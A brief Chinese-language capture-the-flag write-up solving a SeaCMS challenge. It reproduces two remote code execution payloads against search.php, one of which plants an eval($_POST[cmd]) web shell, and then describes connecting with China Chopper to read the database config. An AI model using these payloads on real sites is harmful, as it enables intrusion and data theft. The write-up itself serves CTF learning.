打開發現是海洋cms,那就搜索相關漏洞
找到一篇介紹海洋cms的命令執行漏洞的文章:https://www.jianshu.com/p/ebf156afda49
直接利用其中給出的poc
/search.php
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
可以執行系統命令
沒找到flag,考慮可能在數據庫中,想上傳一句話,然后用菜刀查數據庫來着,但是沒有寫文件的權限,手動查數據庫感覺太麻煩,所以換個exp
海洋cms v6.28命令執行漏洞 : https://www.uedbox.com/seacms-v628-0day/
/search.php?searchtype=5&tid=&area=eval($_POST[cmd])
菜刀直接連接
找了好久終於找到數據庫配置文件
編輯該條shell配置如下
最后得到flag